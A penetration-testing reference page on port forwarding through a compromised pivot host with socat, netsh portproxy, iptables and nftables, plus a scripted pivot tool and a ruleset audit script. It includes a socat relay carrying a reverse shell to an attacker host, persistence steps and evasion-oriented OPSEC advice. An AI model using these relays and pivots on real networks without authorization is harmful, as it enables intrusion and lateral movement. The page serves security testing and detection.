Native Port Forwarding
#Overview
When SSH is not available, native OS tools provide port forwarding through the pivot host. They need neither an SSH server nor an SSH client on the pivot: socat and iptables/nftables on Linux, and netsh portproxy on Windows, run directly on the compromised host using built-in capabilities. Kernel NAT and netsh require root or Administrator; socat only needs a user that can bind the chosen listen port.
#socat (Extended)
#Port Relay Patterns
# Simple TCP relay: forward local 8080 to 172.16.0.10:80
socat TCP-LISTEN:8080,fork TCP:172.16.0.10:80
# Bind to specific interface
socat TCP-LISTEN:8080,fork,bind=10.10.10.10 TCP:172.16.0.10:80
# UDP relay
socat UDP-LISTEN:5353,fork UDP:172.16.0.10:53
# IPv6 relay
socat TCP6-LISTEN:8080,fork TCP6:[fd00::10]:80
BASH
#SSL Wrapping
# TLS-wrapped forward: clients speak TLS to the pivot, plaintext continues to the target.
# verify=0 on the listener is needed because socat otherwise requests and checks a client certificate by default.
socat OPENSSL-LISTEN:8443,fork,cert=server.pem,key=server.key,verify=0 TCP:172.16.0.10:80
# Connect to a TLS service through the relay (verify=0 accepts any server cert, so the target could be spoofed)
socat TCP-LISTEN:8080,fork OPENSSL:172.16.0.10:443,verify=0
# Mutual TLS: the listener only accepts clients whose cert is signed by ca.pem; the outbound leg
# verifies the target against ca.pem and presents its own client cert (client.pem/client.key)
socat OPENSSL-LISTEN:8443,fork,cert=server.pem,key=server.key,cafile=ca.pem OPENSSL:172.16.0.10:443,cert=client.pem,key=client.key,cafile=ca.pem
BASH
#Protocol Translation
# TCP to Unix socket (for local services). Anyone who can reach 8080 gets the socket's privileges;
# for docker.sock that is root on the host, so bind to one interface and remove the relay when done.
socat TCP-LISTEN:8080,fork,bind=10.10.10.10 UNIX-CONNECT:/var/run/docker.sock
# TCP to serial (IoT devices). No fork: a serial line cannot be shared between clients,
# and echo=0 stops the tty layer from echoing bytes back into the stream.
socat TCP-LISTEN:8080,reuseaddr /dev/ttyUSB0,b115200,raw,echo=0
# IPv4 to IPv6 bridge
socat TCP4-LISTEN:8080,fork TCP6:[fd00::10]:80
BASH
#Reverse Shell Relay
# Pivot acts as relay between attacker and target reverse shell
# On pivot:
socat TCP-LISTEN:4444,fork TCP:<attacker>:4444
# Target reverse shell connects to pivot:4444
# Pivot relays to attacker:4444
BASH
#Windows netsh (Extended)
#Port Proxy (portproxy)
# IPv4 to IPv4
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=8080 connectaddress=172.16.0.10 connectport=80
# IPv4 to IPv6
netsh interface portproxy add v4tov6 listenaddress=0.0.0.0 listenport=8080 connectaddress=fd00::10 connectport=80
# IPv6 to IPv4
netsh interface portproxy add v6tov4 listenaddress=:: listenport=8080 connectaddress=172.16.0.10 connectport=80
# IPv6 to IPv6
netsh interface portproxy add v6tov6 listenaddress=:: listenport=8080 connectaddress=fd00::10 connectport=80
# List all port proxies
netsh interface portproxy show all
# Delete a port proxy
netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=8080
CMD
#Persistence
# netsh portproxy rules survive reboots automatically (stored in registry)
# Registry location: HKLM\SYSTEM\CurrentControlSet\Services\PortProxy
# Verify persistence
reg query "HKLM\SYSTEM\CurrentControlSet\Services\PortProxy"
# Firewall rule to allow the forwarded port
netsh advfirewall firewall add rule name="Allow 8080" dir=in action=allow protocol=TCP localport=8080
# Delete firewall rule
netsh advfirewall firewall delete rule name="Allow 8080"
CMD
#Common Issues with netsh
- `listenaddress=0.0.0.0` may not work; if so, try the specific interface IP
- Requires the IP Helper service (`iphlpsvc`) to be running; the listening socket then shows up in `netstat -ano` owned by that service's `svchost.exe`, not by a separate process
- Only TCP (no UDP support in portproxy)
- `v4tov6`, `v6tov4` and `v6tov6` need IPv6 enabled on the host
- Changes are persistent; always clean up with `delete` after the engagement
#iptables NAT (Linux Kernel Forwarding)
iptables NAT rules forward traffic at the kernel level: no user-space process, no listening socket in `ss -lnt`, and nothing for process monitoring to flag. That makes it the least conspicuous method on Linux, not an invisible one; the rules are readable with `iptables-save` or `nft list ruleset`, and the ip_forward change is visible through sysctl. Root is required.
#DNAT (Destination NAT) — Port Forward
# Enable IP forwarding (note the current value first so it can be restored at cleanup)
echo 1 > /proc/sys/net/ipv4/ip_forward
# Forward port 8080 to 172.16.0.10:80
iptables -t nat -A PREROUTING -p tcp --dport 8080 -j DNAT --to-destination 172.16.0.10:80
# DNAT only rewrites the destination; the packet still passes the filter table's FORWARD chain.
# On hosts with a DROP policy there (Docker hosts, hardened builds) the forward silently fails without this:
iptables -A FORWARD -p tcp -d 172.16.0.10 --dport 80 -j ACCEPT
iptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
# DNAT keeps the client's real source IP, so the target answers the client directly. If that reply
# does not route back through this host, the handshake never completes: masquerade so the target
# sees this host as the source (the target's logs then show the pivot, not the client).
iptables -t nat -A POSTROUTING -j MASQUERADE
# Or more specific (only the forwarded flow; everything else keeps its real source):
iptables -t nat -A POSTROUTING -d 172.16.0.10 -p tcp --dport 80 -j MASQUERADE
BASH
#SNAT (Source NAT) — Masquerade
# Full subnet routing through this host
iptables -t nat -A POSTROUTING -s 10.10.0.0/24 -o eth1 -j MASQUERADE
# SNAT with specific source IP (when you have a static IP)
iptables -t nat -A POSTROUTING -s 10.10.0.0/24 -o eth1 -j SNAT --to-source 172.16.0.100
BASH
#Forward Specific Host
# 1:1 NAT: every protocol and port sent to this host's 10.10.10.10 address goes to 172.16.0.10
# (this is not a transparent proxy; nothing on this host sees the payload)
iptables -t nat -A PREROUTING -d 10.10.10.10 -j DNAT --to-destination 172.16.0.10
# With port mapping
iptables -t nat -A PREROUTING -d 10.10.10.10 -p tcp --dport 443 -j DNAT --to-destination 172.16.0.10:8443
BASH
#Redirect Local Traffic
# Locally generated traffic never hits PREROUTING; use the nat OUTPUT chain.
# Exclude the account the proxy runs as (proxyuser here), otherwise the proxy's own outbound
# port-80 connections are redirected back to it and loop.
iptables -t nat -A OUTPUT -p tcp --dport 80 -m owner ! --uid-owner proxyuser -j DNAT --to-destination 127.0.0.1:8080
# Transparent proxy for forwarded traffic: redirect all HTTP arriving on this host to local port 8080
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
BASH
#Persistent iptables Rules
# Persisting pivot rules is rarely what you want on an engagement (harder cleanup, on-disk artifact).
# If the pivot must survive a reboot, persist ip_forward as well (e.g. a drop-in under /etc/sysctl.d),
# or the rules come back with forwarding off.
# Save rules (Debian/Ubuntu)
apt install iptables-persistent
netfilter-persistent save
# Rules are written to /etc/iptables/rules.v4 and rules.v6 and restored automatically on boot
# Save rules (RHEL/CentOS/Rocky): the path is /etc/sysconfig/iptables, loaded by the iptables-services unit
dnf install iptables-services
iptables-save > /etc/sysconfig/iptables
systemctl enable --now iptables
# Manual restore from a saved dump (any distro)
iptables-restore < /etc/iptables/rules.v4
BASH
#Cleanup
# List NAT rules (with line numbers, so a rule can also be deleted by position)
iptables -t nat -L -n -v --line-numbers
# Delete a specific rule: repeat the exact -A arguments with -D
iptables -t nat -D PREROUTING -p tcp --dport 8080 -j DNAT --to-destination 172.16.0.10:80
# Flush all NAT rules. This also removes rules the host itself depends on (Docker, libvirt,
# VPN clients), which is noisy and may break services; prefer -D of your own rules.
iptables -t nat -F
# Disable IP forwarding (only if it was 0 before you started; a real router needs it on)
echo 0 > /proc/sys/net/ipv4/ip_forward
BASH
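The DNAT, return-path and cleanup steps above, combined into one script. This is an added example, not code from the original page: it records every rule it adds in a ledger so teardown deletes exactly those rules in reverse order instead of flushing the nat table, adds the FORWARD accepts that hosts with a DROP policy need, masquerades only the forwarded flow, and restores ip_forward to whatever value it had. The `IPTABLES`, `IP_FORWARD_FILE` and `LEDGER` variables are introduced here as assumptions so the logic can be exercised without root by pointing `IPTABLES` at a logging shell function.

```shell
#!/bin/sh
# Added example, not from the original page: iptables pivot up/down with a
# ledger so teardown removes exactly the rules we added, in reverse order.
# IPTABLES, IP_FORWARD_FILE and LEDGER are assumptions introduced here; they
# default to the real binary and sysctl path but can be overridden for a
# dry run (e.g. IPTABLES=some_logging_function) without root.
IPTABLES=${IPTABLES:-iptables}
IP_FORWARD_FILE=${IP_FORWARD_FILE:-/proc/sys/net/ipv4/ip_forward}
LEDGER=${LEDGER:-/tmp/pivot.ledger}

# ipt_add ARGS...: apply one "-A" rule and record its arguments on success.
ipt_add() {
    "$IPTABLES" "$@" || return 1
    printf '%s\n' "$*" >> "$LEDGER"
}

# pivot_up LPORT TARGET TPORT [OIF]: forward LPORT on this host to TARGET:TPORT,
# with the target reached through interface OIF (default eth1).
pivot_up() {
    lport=$1; target=$2; tport=$3; oif=${4:-eth1}
    : > "$LEDGER"
    # Save the current forwarding state so pivot_down can restore it verbatim.
    cat "$IP_FORWARD_FILE" > "$LEDGER.ipfwd"
    echo 1 > "$IP_FORWARD_FILE"
    # DNAT rewrites the destination of packets arriving on LPORT.
    ipt_add -t nat -A PREROUTING -p tcp --dport "$lport" \
        -j DNAT --to-destination "$target:$tport" || return 1
    # DNAT only rewrites; the packet still traverses FORWARD. On hosts whose
    # FORWARD policy is DROP (Docker is the usual surprise) it dies here.
    ipt_add -A FORWARD -p tcp -d "$target" --dport "$tport" \
        -m conntrack --ctstate NEW,ESTABLISHED,RELATED -j ACCEPT || return 1
    ipt_add -A FORWARD -p tcp -s "$target" --sport "$tport" \
        -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT || return 1
    # Masquerade only the forwarded flow so the target answers this host
    # (fixing the return path) while all other traffic keeps its real source.
    ipt_add -t nat -A POSTROUTING -o "$oif" -p tcp -d "$target" --dport "$tport" \
        -j MASQUERADE || return 1
}

# pivot_down: replay the ledger newest-first with -A turned into -D, then put
# ip_forward back. Never "-t nat -F": that would also drop rules the host
# legitimately relies on (Docker, libvirt, VPNs).
pivot_down() {
    [ -f "$LEDGER" ] || return 1
    # sed -n '1!G;h;$p' reverses the lines (a portable tac); word splitting of
    # $rule into separate arguments is intended.
    sed -n '1!G;h;$p' "$LEDGER" | sed 's/-A /-D /' | while read -r rule; do
        # shellcheck disable=SC2086
        "$IPTABLES" $rule
    done
    cat "$LEDGER.ipfwd" > "$IP_FORWARD_FILE"
    rm -f "$LEDGER" "$LEDGER.ipfwd"
}

case "${1:-}" in
    up)   shift; pivot_up "$@" ;;
    down) pivot_down ;;
esac
```

Usage on the pivot: `sh pivot.sh up 8080 172.16.0.10 80 eth1`, later `sh pivot.sh down`. The ledger lives in /tmp by default; that file is itself an artifact, so remove it (the script does) and pick a less obvious path via `LEDGER=` if the host is being watched.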
#nftables (Modern Linux)
nftables is replacing iptables on modern Linux distributions. Unlike iptables, nft has no built-in nat table: the table and its hooked chains must be created first, or the `add rule` commands fail with "No such file or directory".
# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
# Create a nat table with chains hooked at prerouting and postrouting
# (pick a table name that does not collide with one firewalld or Docker already owns)
nft add table ip nat
nft 'add chain ip nat prerouting { type nat hook prerouting priority -100; }'
nft 'add chain ip nat postrouting { type nat hook postrouting priority 100; }'
# DNAT: forward port 8080 to 172.16.0.10:80
nft add rule ip nat prerouting tcp dport 8080 dnat to 172.16.0.10:80
# MASQUERADE
nft add rule ip nat postrouting oifname "eth1" masquerade
# List rules (the whole ruleset, or just our table)
nft list ruleset
nft list table ip nat
# Cleanup: delete only the table we created. `nft flush ruleset` would also wipe the host firewall.
nft delete table ip nat
BASH
#Common Pitfalls
- IP forwarding disabled: iptables/nftables DNAT requires `ip_forward=1`. Without it, the rewritten packets are dropped.
- Return path broken: if the target can route directly back to the original source, it will not send replies through the pivot and the handshake never completes. Use MASQUERADE or SNAT on the pivot.
- FORWARD policy DROP: DNAT only rewrites the destination; the packet still has to pass the filter table's FORWARD chain. Docker hosts and many hardened builds default that chain to DROP, so add an ACCEPT for the forwarded flow.
- netsh requires IP Helper: on Windows, the IP Helper service must be running for portproxy to work.
- socat process visibility: socat creates a user-space process visible in `ps` output. iptables does not, but its rules are visible in `iptables-save` and `nft list ruleset`.
- nftables vs iptables: some modern distros use the nftables backend with iptables syntax. Check with `iptables --version`, which prints `(nf_tables)` or `(legacy)`. Rules added with native `nft` commands do not appear in `iptables-save`, so check both when auditing or cleaning up.
#OPSEC Considerations
- iptables/nftables NAT rules are kernel-level: no process to detect in `ps` and no listening socket. They are still visible to anyone who runs `iptables-save`, `nft list ruleset` or reads `/proc/sys/net/ipv4/ip_forward`, and the rewritten flows appear in the conntrack table.
- iptables rules persist across reboots with iptables-persistent; that also leaves them on disk in /etc/iptables/rules.v4 for a forensic review.
- netsh portproxy rules are stored in the Windows registry and survive reboots; the listener appears in `netstat -ano` bound by the IP Helper svchost.
- socat processes are visible and may be flagged by process monitoring; the command line (listen and connect addresses) is readable by every local user.
- Always clean up iptables/netsh rules after the engagement, and restore ip_forward to its previous value.
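Because the kernel-level rules leave no process behind, the check a responder runs, and the one a tester uses to confirm their own cleanup, is on the ruleset itself. This is an added example, not from the original page: a small awk audit over `iptables-save` output that lists every address-rewriting rule and any FORWARD accept, plus a check of the ip_forward knob. The `pivot_indicators` and `ip_forward_on` names are introduced here, and the sample ruleset is constructed for the example rather than captured from a host.

```shell
#!/bin/sh
# Added example, not from the original page: audit an iptables-save dump for
# the rules a pivot leaves behind. pivot_indicators, ip_forward_on and the
# sample ruleset are introduced here; the ruleset is constructed, not captured.

# pivot_indicators: read iptables-save text on stdin and print one line per
# address-rewriting rule (DNAT, REDIRECT, MASQUERADE, SNAT) as
# "TABLE CHAIN TARGET DEST", plus any FORWARD accept in the filter table,
# which is what a DNAT pivot needs on a host whose FORWARD policy is DROP.
pivot_indicators() {
    awk '
        /^\*/ { table = substr($0, 2); next }        # *nat, *filter ...
        /^-A / {
            chain = $2; target = ""; dest = "-"
            for (i = 3; i < NF; i++) {
                if ($i == "-j") target = $(i + 1)
                if ($i == "--to-destination" || $i == "--to-ports" || $i == "--to-source")
                    dest = $(i + 1)
            }
            if (target == "DNAT" || target == "REDIRECT" ||
                target == "MASQUERADE" || target == "SNAT")
                printf "%s %s %s %s\n", table, chain, target, dest
            else if (table == "filter" && chain == "FORWARD" && target == "ACCEPT")
                printf "%s %s FORWARD-ACCEPT %s\n", table, chain, dest
        }'
}

# ip_forward_on [FILE]: true when the kernel forwarding knob is set. On a box
# that is not meant to route, this alone is worth a closer look.
ip_forward_on() {
    [ "$(cat "${1:-/proc/sys/net/ipv4/ip_forward}")" = "1" ]
}

# Constructed sample: what iptables-save prints after the DNAT, REDIRECT and
# SNAT commands from this page, on a host whose FORWARD policy is DROP.
sample_ruleset() {
    cat <<'EOF'
*filter
:INPUT ACCEPT [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A FORWARD -d 172.16.0.10/32 -p tcp -m tcp --dport 80 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
COMMIT
*nat
:PREROUTING ACCEPT [0:0]
:INPUT ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A PREROUTING -p tcp -m tcp --dport 8080 -j DNAT --to-destination 172.16.0.10:80
-A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 8080
-A POSTROUTING -s 10.10.0.0/24 -o eth1 -j SNAT --to-source 172.16.0.100
-A POSTROUTING -o eth1 -j MASQUERADE
COMMIT
EOF
}

# Stand-alone run: audit the live ruleset with --live, otherwise the sample.
if [ "${1:-}" = "--live" ]; then
    iptables-save | pivot_indicators
    ip_forward_on && echo "ip_forward=1"
else
    sample_ruleset | pivot_indicators
fi
```

On the sample this prints the FORWARD accept, the DNAT to 172.16.0.10:80, the REDIRECT to 8080, the SNAT and the MASQUERADE, and nothing for the ordinary INPUT accept. On an nftables host `iptables-save` (the nf_tables build) only shows tables created through iptables, so pair it with `nft list ruleset` to catch rules added with native `nft` commands.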
#Cross-References
- SSH Port Forwarding — SSH-based port forwarding
- Metasploit Routing — Metasploit autoroute and portfwd
- Network Enumeration — Discover targets to forward to